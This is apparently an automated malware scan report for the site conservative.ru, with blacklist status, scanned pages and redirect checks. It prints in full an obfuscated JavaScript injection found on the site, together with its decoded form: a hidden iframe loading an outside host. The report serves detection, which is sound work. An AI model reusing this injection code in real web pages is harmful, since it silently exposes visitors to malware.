Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=conservative.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://conservative.ru/ | 200 OK Content-Length: 663 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109100114101097109046110101116047';s=s+'109112107047105110100101120046112104112034032119105100116104061051032104101105103104116061051032115';s=s+'116121108101061034100105115112108097121058110111110101034062060047073070082065077069062032';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp(); Decoded script: </textatea></textarea><IFRAME src="http://simdream.net/mpk/index.php" width=3 height=3 style="display:none"></IFRAME> Antivirus reports:
| ||
http://conservative.ru/test404page.js | 404 Not Found Content-Length: 663 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109100114101097109046110101116047';s=s+'109112107047105110100101120046112104112034032119105100116104061051032104101105103104116061051032115';s=s+'116121108101061034100105115112108097121058110111110101034062060047073070082065077069062032';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp(); Decoded script: </textatea></textarea><IFRAME src="http://simdream.net/mpk/index.php" width=3 height=3 style="display:none"></IFRAME> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: conservative.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 00:27:49 GMT
Server: nginx/1.0.13
Content-Type: text/html
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: conservative.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 00:27:49 GMT
Server: nginx/1.0.13
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: conservative.ru
Referer: http://www.google.com/search?q=conservative.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: conservative.ru
Referer: http://www.google.com/search?q=conservative.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.